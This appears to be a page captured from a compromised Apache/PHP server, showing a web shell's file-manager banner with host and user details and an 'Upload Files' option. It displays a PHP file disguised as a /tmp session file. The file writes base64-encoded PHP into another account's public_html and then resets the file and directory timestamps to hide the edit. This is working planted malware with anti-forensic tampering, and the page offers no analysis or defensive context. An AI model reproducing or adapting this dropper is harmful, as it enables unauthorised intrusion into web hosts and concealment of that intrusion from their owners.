HEX
Server: Apache/2.4.62 (Unix) OpenSSL/1.1.1k
System: Linux ns565604.ip-54-39-133.net 4.18.0-553.50.1.el8_10.x86_64 #1 SMP Tue Apr 15 08:09:22 EDT 2025 x86_64
User: greer489 (1034)
PHP: 8.3.19
Disabled: NONE
Upload Files
File: //tmp/sess_1c0abd8f3bf9ef43db0cce798e622b00
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$filepath = "/home/pati454t/public_html/yydknjsv.php"; $dirpath = @dirname($filepath); $tm = @filemtime($filepath);$mf = @fopen($filepath, "w"); if ($mf) { $txt = base64_decode("PD9waHAgZWNobyAiZXZhbCgpOyI7"); fwrite($mf, $txt); fclose($mf); print("<div>Edited!</div>\n<br>"); } if(file_exists($filepath)) { $txt = file_get_contents($filepath); print("<textarea>$txt</textarea>"); if($tm) { @touch($filepath,$tm,$tm); @touch($dirpath,$tm,$tm); } };echo "Result:OK"; echo "</body></html>";  die;